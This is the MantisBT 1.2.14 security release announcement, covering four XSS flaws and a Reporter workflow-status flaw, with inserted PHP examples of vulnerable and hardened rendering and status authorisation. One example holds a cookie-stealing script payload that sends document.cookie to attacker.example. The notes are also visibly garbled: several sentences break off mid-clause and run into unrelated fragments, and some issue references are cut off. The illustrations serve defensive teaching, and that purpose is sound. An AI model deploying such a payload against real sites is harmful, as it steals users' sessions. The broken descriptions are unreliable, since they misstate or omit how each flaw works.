Blog Post: http://www.mantisbt.org/blog/?p=244
MantisBT 1.2.14 is a security update for the stable 1.2.x branch.
All installations that are currently running any 1.2.x version are strongly
advised to upgrade to this release.
The following release notes are relative to 1.2.12 (rather than 1.2.13).
Four cross-site scripting (XSS) vulnerabilities were discovered:
- A malicious person could trick a target user’s browser into
critical, due to the affected page (search.php) being usable anonymously on
public-facing installations (i.e. without the need for a user login).
Affects MantisBT 1.2.12 only (earlier versions are not impacted). Refer
to issue #15373 <http://www.mantisbt.org/bugs/view.php?id=15373> for
- A user holding manager/administrator permissions could create a
visitors to (a) the Summary page (summary.php) as well as (b) the
Configuration Report page (adm_config_report.php), are exposed to having
this issue is mitigated by the need to have a privileged account to modify
category and project names. Issue (a) affects MantisBT version 1.2.12 and
above, while (b) is on 1.2.13 only; earlier releases are not impacted.
Refer to issues #15384 <http://www.mantisbt.org/bugs/view.php?id=15384> (a)
and #15415 <http://www.mantisbt.org/bugs/view.php?id=15415> (b) for
- An administrator could enter a configuration option containing
Configuration Report page (adm_config_report.php). The severity of this
issue is mitigated by the need to have a privileged account. Affects all
MantisBT 1.2.x versions. Refer to issue
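The XSS items above share one root cause: text that an attacker can influence (a search parameter, a project or category name, a configuration value) is written into HTML without being escaped on output. The PHP below is an added illustration, not MantisBT code and not the project's actual fix: it places a vulnerable row renderer beside a hardened one that escapes every database-sourced value at the point of output. The category-name payload, the function names and the table layout are constructed for the example.

```php
<?php
// Added illustration, not MantisBT code: a stored XSS payload in a name that a
// privileged user controls, rendered unescaped, and the escaping that neutralises
// it. The payload, function names and markup below are constructed.

declare(strict_types=1);

// Constructed sample: what a malicious manager could save as a category name.
$categoryName = 'Backend<script>document.location="http://attacker.example/?c="+document.cookie</script>';

// Vulnerable rendering: the raw name is interpolated straight into the HTML,
// so the <script> element above reaches every visitor's browser.
function render_category_row_vulnerable(string $name, int $count): string
{
    return "<tr><td>$name</td><td>$count</td></tr>\n";
}

// Hardened rendering: escape on output. ENT_QUOTES also escapes single quotes,
// so the same helper is safe inside attribute values; naming the charset
// explicitly avoids encoding-dependent bypasses; ENT_SUBSTITUTE replaces
// invalid byte sequences instead of returning an empty string silently.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_category_row(string $name, int $count): string
{
    return '<tr><td>' . html_escape($name) . '</td><td>' . $count . "</td></tr>\n";
}

echo "Vulnerable output:\n" . render_category_row_vulnerable($categoryName, 3);
echo "Hardened output:\n" . render_category_row($categoryName, 3);
```

The same escape-on-output rule covers the configuration value shown on adm_config_report.php: trusting the writer of a value (manager, administrator) is not a substitute for escaping it, because the page is rendered for other users.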
A workflow-related security issue was also fixed:
- A user with “Reporter” permissions could modify the workflow status of
any issue to “New” even if they do not have the necessary privileges to
make this change. Refer to issue
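The workflow fix is an authorisation check on the status transition. The PHP below is an added illustration, not MantisBT's code or its fix: the access-level and status constants, the per-status threshold map and the function name are assumptions chosen for the example. The point it demonstrates is that a transition to “New” is authorised by the same lookup as every other target status, rather than being special-cased into a bypass.

```php
<?php
// Added illustration, not MantisBT code: authorising a status change by looking
// up the access level the target status requires. All constants, the threshold
// map and the function name are assumptions made for this example.

declare(strict_types=1);

// Assumed access levels and status codes.
const ACCESS_REPORTER  = 25;
const ACCESS_DEVELOPER = 55;
const STATUS_NEW       = 10;
const STATUS_ASSIGNED  = 50;
const STATUS_RESOLVED  = 80;

// Assumed per-status threshold: the minimum access level needed to move an
// issue into that status. "New" has an explicit entry like every other status.
const STATUS_ACCESS_THRESHOLD = [
    STATUS_NEW      => ACCESS_DEVELOPER,
    STATUS_ASSIGNED => ACCESS_DEVELOPER,
    STATUS_RESOLVED => ACCESS_DEVELOPER,
];

function can_change_status(int $userAccess, int $currentStatus, int $newStatus): bool
{
    if ($currentStatus === $newStatus) {
        return true;    // no transition requested, nothing to authorise
    }
    if (!array_key_exists($newStatus, STATUS_ACCESS_THRESHOLD)) {
        return false;   // unknown target status: deny by default
    }
    return $userAccess >= STATUS_ACCESS_THRESHOLD[$newStatus];
}

// A reporter trying to push a resolved issue back to "New" is refused,
// while a developer making the same transition is allowed.
var_dump(can_change_status(ACCESS_REPORTER, STATUS_RESOLVED, STATUS_NEW));
var_dump(can_change_status(ACCESS_DEVELOPER, STATUS_RESOLVED, STATUS_NEW));
```

Denying unknown target statuses by default matters as much as the threshold itself: a status that is missing from the map should never be reachable by any user.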
In addition to the corrections for the above-mentioned security issues,
this release also includes several bug fixes and enhancements:
- improved Manage Configuration page (better performance, ability to
filter and edit config options)
- support for the built-in SOAP extension in addition to nusoap
- updated translations in many languages
A full changelog for 1.2.14 can be found at
Go ahead and download <http://www.mantisbt.org/download.php> it now.
Check out Hosted MantisBT <http://www.mantisbt.org/hosting.php> to be up and
running in minutes. For optimized access to MantisBT from iPhone, Android
and Windows Phone, check out MantisTouch <http://www.mantistouch.org/>.